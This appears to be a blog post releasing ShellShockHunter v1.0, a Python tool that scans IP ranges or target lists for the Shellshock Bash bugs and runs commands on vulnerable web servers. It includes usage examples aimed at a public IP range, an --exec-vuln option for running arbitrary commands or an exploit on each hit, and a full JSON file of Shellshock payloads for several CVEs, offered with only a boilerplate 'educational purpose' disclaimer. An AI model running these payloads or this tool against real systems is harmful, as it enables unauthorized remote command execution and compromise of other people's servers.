ShellShockHunter Tool v1.0

Publicado em por

ShellShockHunter v1.0  

Autor:    MrCl0wn
Blog:     http://blog.mrcl0wn.com
GitHub:   https://github.com/MrCl0wnLab
Twitter:  https://twitter.com/MrCl0wnLab
Email:    [email protected]
Shellshock (software bug)

Shellshock, also known as Bashdoor, is a family of security bugs in the Unix
Bash shell, the first of which was disclosed on 24 September 2014. Shellshock
could enable an attacker to cause Bash to execute arbitrary commands and
gain unauthorized access to many Internet-facing services, such as web servers,
that use Bash to process requests.

DISCLAIMER

This or previous program is for Educational purpose ONLY. Do not use
it without permission. The usual disclaimer applies, especially the fact
that me (MrCl0wnLab) is not liable for any
damages caused by direct or indirect use of the information or
functionality provided by these programs. The author or any Internet
provider bears NO responsibility for content or misuse of these programs
or any derivatives thereof. By using these programs you accept the fact
that any damage (dataloss, system crash, system compromise, etc.)
caused by the use of these programs is not MrCl0wnLab’s responsibility.

GIT CLONE
git clone https://github.com/MrCl0wnLab/ShellShockHunter
INSTALLATION  pip
pip install shodan 
pip install ipinfo
HELP
                                   ,/
                                 ,'/
                               ,' /
                             ,'  /_____,
                           .'____    ,'    
                                /  ,'
                               / ,'
                              /,'
                             /'
     ____  _     _____ _     _     ____  _      ___       _    
    / ___|| |__ |___ /| |   | |   / ___|| |__  / _   ___| | __
    ___ | '_   |_ | |   | |   ___ | '_ | | | |/ __| |/ /
     ___) | | | |___) | |___| |___ ___) | | | | |_| | (__|   < 
    |____/|_| |_|____/|_____|_____|____/|_| |_|___/ ___|_|_
             __   _   _             _              __                  
            | _| | | | |_   _ _ __ | |_ ___ _ __  |_ |                 
            | |  | |_| | | | | '_ | __/ _  '__|  | |                 
            | |  |  _  | |_| | | | | ||  __/ |     | |                 
            | |  |_| |_|__,_|_| |_|_____|_|     | |                 
            |__|                                  |__| v1.0                
              By: MrCl0wn / https://blog.mrcl0wn.com         
 
usage: tool [-h] [--file <ips.txt>] [--range <ip-start>,<ip-end>] [--cmd-cgi <command shell>] [--exec-vuln <command shell>] [--thread <10>] [--check] [--ssl] [--cgi-file <cgi.txt>] [--timeout <5>] [--all] [--debug]

optional arguments:
  -h, --help        show this help message and exit
  --file <ips.txt>  File targets
  --range <ip-start>,<ip-end>
                    Range IP Ex: 192.168.15.1,192.168.15.100
  --cmd-cgi <command shell>
                    Command: uname -a
  --exec-vuln <command shell>
                    Executing commands on vulnerable targets
  --thread <10>, -t <10>
                    Eg. 20
  --check           Checker vuln
  --ssl             Set protocol https
  --cgi-file <cgi.txt>
                    Set file cgi
  --timeout <5>     Set timeout conection
  --all             Teste all payloads
  --debug           Set debugs
COMMAND e.g:
python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl

python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 10 --ssl --cgi-file 'wordlist/cgi.txt'

python main.py --range '194.206.187.X,194.206.187.XXX' --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt'

python main.py --file targets.txt --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt'

python main.py --file targets.txt --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt' --all

python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl --cgi-file 'wordlist/cgi2.txt' --exec-vuln 'curl -v -k -i "_TARGET_"'

python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl --cgi-file 'wordlist/cgi2.txt' --exec-vuln './exploit -t "_TARGET_"'
PRINTS:

Logo

PROCESS

Logo

ESPECIAL COMMAND ( –exec-vuln ‘echo "_TARGET_"‘ )

Logo

SOURCE FILE ( Exploits )

pwd: assets/exploits.json

{
    "DEFAULT":
        "() { :; }; echo ; /bin/bash -c '_COMMAND_'",
    "CVE-2014-6271": 
        "() { :; }; echo _CHECKER_; /bin/bash -c '_COMMAND_'",
    "CVE-2014-6271-2":
        "() { :;}; echo '_CHECKER_' 'BASH_FUNC_x()=() { :;}; echo _CHECKER_' bash -c 'echo _COMMAND_'",
    "CVE-2014-6271-3":
        "() { :; }; echo ; /bin/bash -c '_COMMAND_';echo _CHECKER_;",
    "CVE-2014-7169":
        "() { (a)=>\' /bin/bash -c 'echo _CHECKER_'; cat echo",
    "CVE-2014-7186":
        "/bin/bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo '_CHECKER_, redir_stack'",
    "CVE-2014-7187":
        "(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | /bin/bash || echo '_CHECKER_, word_lineno'",
    "CVE-2014-6278":
        "() { _; } >_[$($())] { echo _CHECKER_; id; } /bin/bash -c '_COMMAND_'",
    "CVE-2014-6278-2":    
        "shellshocker='() { echo _CHECKER_; }' bash -c shellshocker",
    "CVE-2014-6277":
        "() { x() { _; }; x() { _; } <<a; } /bin/bash -c _COMMAND_;echo _CHECKER_",
    "CVE-2014-*":
        "() { }; echo _CHECKER_' /bin/bash -c '_COMMAND_'"
}

SOURCE FILE ( Config )

pwd: assets/config.json



{
    "config": {
        "threads": 10,
        "path": {
            "path_output": "output/",
            "path_wordlist": "wordlist/",
            "path_modules": "modules/",
            "path_assets": "assets/"
        },
        "files_assets":{
            "config": "assets/config.json",
            "autor": "assets/autor.json",
            "exploits": "assets/exploits.json"
        },
        "api":{
            "shodan":"",
            "ipinfo":""
        }
    }
}
TREE
├── assets
│   ├── autor.json
│   ├── config.json
│   ├── exploits.json
│   └── prints
│       ├── banner.png
│       ├── print01.png
│       ├── print02.png
│       └── print03.png
├── main.py
├── modules
│   ├── banner_shock.py
│   ├── color_shock.py
│   ├── file_shock.py
│   ├── __init__.py
│   ├── request_shock.py
│   ├── shodan_shock.py
│   └── thread_shock.py
├── output
│   └── vuln.txt
├── README.md
└── wordlist
    └── cgi.txt

REF

  1. https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf
  2. https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details
  3. https://blog.inurl.com.br/search?q=shellshock
  4. https://github.com/googleinurl/Xpl-SHELLSHOCK-Ch3ck/blob/master/xplSHELLSHOCK.php
  5. https://github.com/chelseakomlo/shellshock_demo
  6. https://github.com/xdistro/ShellShock/blob/master/shellshock_test.sh
  7. https://github.com/capture0x/XSHOCK/blob/master/main.py
  8. https://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html
  9. https://blog.sucuri.net/2014/09/bash-vulnerability-shell-shock-thousands-of-cpanel-sites-are-high-risk.html
  10. https://github.com/BuddhaLabs/PacketStorm-Exploits/blob/master/1410-exploits/apachemodcgi-shellshock.txt
  11. https://github.com/gajos112/OSCP/blob/master/Shellshock.txt
  12. https://dl.packetstormsecurity.net/1606-exploits/sunsecuregdog-shellshock.txt
  13. http://stuff.ipsecs.com/files/ucs-shellshock_pl.txt
  14. https://github.com/opsxcq/exploit-CVE-2014-6271
  15. https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details
  16. https://manualdousuario.net/shellshock-bash-falha/
  17. https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit